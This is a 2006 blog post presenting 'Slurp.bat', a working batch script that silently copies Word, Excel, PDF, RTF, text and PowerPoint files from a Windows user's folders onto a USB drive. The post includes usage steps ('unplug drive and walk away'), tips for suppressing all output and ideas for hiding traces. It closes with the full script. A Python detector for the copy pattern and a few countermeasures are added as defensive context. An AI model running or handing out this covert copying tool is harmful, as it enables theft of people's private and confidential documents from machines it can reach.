Slurp.bat
by Ravi Mohan
Purpose:
To create a simple proof-of-concept application that searches for office documents and copies them from a Windows computer to any removable storage device.
The point of this exercise is to demonstrate (qualitatively) how easy it is to carry out data theft with removable storage devices.
Method:
I utilised the Xcopy command with silent and recursive options for each filetype in a hardcoded target directory. I also suppressed any messages by piping the output to a standard text file that is deleted at the end of the process. The real purpose of the batch file is a one-click implementation of the use of the command, over multiple filetypes, as well as to not have any "obvious" output on the shell. *click* *click* is less obvious than *typetypetypetype*, after all.
The most interesting thing about this is that all components used for this function exactly as they are designed to, and there is no real 'exploit' other than at the social level (i.e. getting access to a system with malicious intent).
I'd note this version was optimised for silent running and not reliability (and there's one situation that will hang up the download of files w/o any warning since all warnings are redirected... try to find it). Some small tweaks to the batch script would add some logging capabilities, but I leave that as a (terribly simple) exercise to the reader. It also searches for each filetype recursively, and in addition to the time to copy, I suspect adding more filetypes would increase download time.
Anyone who understands what's being done could *easily* do this (took me 2 hours to perfect, mainly due to rusty DOS skills, and trying to get it *totally* silent), but I strongly discourage usage of this script or any similar tool for illegal activities. It IS, however, a very vivid demonstration of how easy it is to steal data, since anyone with a moderate knowledge of the Windows command line could easily cook up a similar batch file. I personally made extensive use of the help function in producing it too!
tests:
The method was tested on a stock copy of Windows XP SP2 on a Packard Bell Easynote R1938 with a 1.6 GHz processor and 1 GB RAM, using USB 2.0 drives. The version of Windows was fully patched, in both admin and LUA. There wasn't any noticeable performance difference between USB/IDE drives and USB flash drives, though the amount of files on my system (~4 MB) was not large.
results:
All files of target types in user directory were copied.
howto
1) copy the slurp.bat file to your storage device (preferably off the target system)
2) create the "slurp" folder (you're free to change the name... but you'll need to edit the relevant parts of the script)
3) run slurp.bat
4) a blank black window will open and, when the transfer is done, will close.
5) unplug drive and walk away
future enhancements:
see if it's possible to speed it up
test on a systemwide scale as opposed to /user/ folder
check for traces left behind
see if I can get multiple filetypes in one line
dedicated programme for the job (though this setup is simpler and more powerful)
possible countermeasures:
possibly disable use of USB drives on systems with sensitive data
common sense
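A further countermeasure is detection. The following is an added example, not part of the original post: it flags the copy pattern this script produces, assuming process-creation auditing with command lines is collected. The host names, PIDs, threshold and function names are constructed for illustration.

```python
import re
from collections import defaultdict

DOC_EXTS = {"doc", "xls", "pdf", "rtf", "txt", "ppt"}  # the types the script targets
MIN_TYPES = 3  # assumed threshold: distinct document types copied by one parent
# Constructed sample: (host, parent PID, command line) as process-creation auditing
# would record them. cmd.exe consumes "> empty.txt", so it never appears here.
SAMPLE_EVENTS = [
    ("WS-07", 4120, r'xcopy "c:\Documents and Settings"\*.' + ext + r' \slurp\ /s /Q /c /y')
    for ext in ("doc", "xls", "pdf", "rtf", "txt", "ppt")
] + [
    ("WS-02", 880, r'xcopy c:\build\*.txt c:\release\ /s /y'),
    ("WS-02", 880, r'xcopy "c:\Documents and Settings\amy\report.doc" e:\backup\ /y'),
]

def drive(path):
    """Drive letter of a path, or None when the path is drive-relative."""
    m = re.match(r'"?([a-z]):', path.lower())
    return m.group(1) if m else None

def bulk_copy_ext(cmdline):
    """Return the document extension if this is a recursive wildcard xcopy
    whose destination is not on the source drive, else None."""
    tokens = re.findall(r'(?:"[^"]*"|\S)+', cmdline)
    if not tokens or not re.fullmatch(r'(.*\\)?xcopy(\.exe)?', tokens[0].strip('"').lower()):
        return None
    switches = {t[1:].lower() for t in tokens[1:] if t.startswith("/")}
    paths = [t for t in tokens[1:] if not t.startswith("/")]
    if len(paths) < 2 or not switches & {"s", "e"}:
        return None
    m = re.search(r'\*\.(\w+)"?$', paths[0])
    if not m or m.group(1).lower() not in DOC_EXTS:
        return None
    # A drive-relative destination resolves against the current drive, which for
    # a script launched from removable media is that media: treat it as "other".
    return m.group(1).lower() if drive(paths[1]) != drive(paths[0]) else None

def find_sweeps(events):
    """Group flagged copies by (host, parent PID); report broad sweeps."""
    seen = defaultdict(set)
    for host, ppid, cmdline in events:
        ext = bulk_copy_ext(cmdline)
        if ext:
            seen[(host, ppid)].add(ext)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= MIN_TYPES}

if __name__ == "__main__":
    for (host, ppid), exts in find_sweeps(SAMPLE_EVENTS).items():
        print(f"{host}: parent {ppid} swept {', '.join(exts)} to another drive")
```

Grouping by parent process is what separates a one-click sweep over many filetypes from an ordinary single xcopy backup.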
acknowledgements:
Abe Usher @ http://www.sharp-ideas.net, whose slurp-audit made me wonder if it was as easy as I thought it was. It's probably a better tool for security work than this, since it doesn't actually carry out the nasty bit of the process.
the actual script
@echo off
rem slurp file copying script by faileas
rem for educational purposes only, since it's so bloody simple anyway, anyone with dos skills could work it out
rem notes: slurp assumes you have the correct directories created in the target drive. read and understand the commands!
rem slurp will find and download the filetypes listed. i don't think it's 100% efficient timewise,
rem but it's simple enough to memorise. The pipe out to empty.txt suppresses console messages, but might not always be necessary
rem for additional options try help Xcopy
(Edit: the second line with the empty.txt should NOT wrap and belongs to the earlier lines.)
@echo off
xcopy "c:\Documents and Settings"\*.doc \slurp\ /s /Q /y >empty.txt
xcopy "c:\Documents and Settings"\*.xls \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.pdf \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.rtf \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.txt \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.ppt \slurp\ /s /q /c /y > empty.txt
del empty.txt
Wednesday, October 11, 2006